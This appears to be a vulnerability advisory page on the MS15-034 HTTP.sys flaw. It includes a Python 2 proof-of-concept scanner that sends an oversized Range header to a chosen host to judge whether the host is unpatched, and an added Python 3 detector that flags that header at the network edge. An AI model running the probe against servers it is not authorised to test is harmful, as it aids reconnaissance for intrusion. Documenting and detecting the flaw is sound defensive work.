HTTP.sys Remote Code Execution Vulnerability


A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys). It is triggered when HTTP.sys fails to parse a specially crafted HTTP request correctly. An attacker who successfully exploits this vulnerability can execute arbitrary code in the context of the System account.

Official documentation: https://technet.microsoft.com/zh-cn/library/security/MS15-034

POC (Python 2):

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import socket
import sys

ipAddr = raw_input("Please set your target:")
# 2**64 - 1: an upper range bound that HTTP.sys did not range-check before MS15-034
hexAllFfff = "18446744073709551615"
# Plain request used only to fingerprint the server as IIS
req1 = "GET / HTTP/1.0\r\n\r\n"
# Probe request carrying the oversized Range header
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

print "[*] Audit Started"

try:
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect((ipAddr, 80))
    client_socket.send(req1)
    boringResp = client_socket.recv(1024)
    if "Microsoft" not in boringResp:
        print "[*] Not IIS"
        sys.exit(0)
    client_socket.close()

    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect((ipAddr, 80))
    client_socket.send(req)
    goodResp = client_socket.recv(1024)
    client_socket.close()
    # An unpatched HTTP.sys answers 416; a patched one rejects the header as invalid
    if "Requested Range Not Satisfiable" in goodResp:
        print "[!!] Looks VULN"
    elif "The request has an invalid header name" in goodResp:
        print "[*] Looks Patched"
    else:
        print "[*] Unexpected response, cannot discern patch status"
except Exception as e:
    print e
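The POC above identifies a vulnerable host by the 416 response to a Range header ending at 2^64-1. The defender's counterpart is to recognise that header on the way in, at a reverse proxy, WAF or IDS hook, before it reaches HTTP.sys. The following Python 3 check is an added example and is not part of the original page; the sample requests are constructed, and the 4 GiB "sane end offset" threshold is an assumption chosen for illustration.

```python
import re
from typing import Dict, List

# 2**64 - 1: the end offset that overflowed HTTP.sys' range arithmetic before MS15-034.
UINT64_MAX = 18446744073709551615
# Assumption: no legitimate client asks for a byte offset beyond 4 GiB.
SANE_END = 2 ** 32

# Constructed sample requests (not captured traffic).
PROBE = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
BENIGN = "GET /video.mp4 HTTP/1.1\r\nHost: example.test\r\nRange: bytes=1000-1999\r\n\r\n"
NO_RANGE = "GET / HTTP/1.0\r\n\r\n"


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request into a lower-cased header map (request line dropped)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def range_findings(raw: str) -> List[str]:
    """Return reasons a request's Range header looks like an MS15-034 probe; empty if clean."""
    value = parse_headers(raw).get("range")
    if value is None or not value.lower().startswith("bytes="):
        return []
    findings: List[str] = []
    for spec in value[len("bytes="):].split(","):
        m = re.fullmatch(r"\s*(\d*)-(\d*)\s*", spec)
        if not m:
            findings.append("malformed range spec %r" % spec)
            continue
        start, end = m.group(1), m.group(2)
        if end and int(end) == UINT64_MAX:
            findings.append("end offset equals 2^64-1 (MS15-034 signature)")
        elif end and int(end) > SANE_END:
            findings.append("end offset %s exceeds sane limit" % end)
        if start and end and int(start) > int(end):
            findings.append("start offset greater than end offset")
    return findings


if __name__ == "__main__":
    for label, req in (("probe", PROBE), ("benign", BENIGN), ("no-range", NO_RANGE)):
        print(label, range_findings(req))
```

A request that produces any finding can be dropped or logged at the edge; on the IIS host itself, applying the MS15-034 update is the fix.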
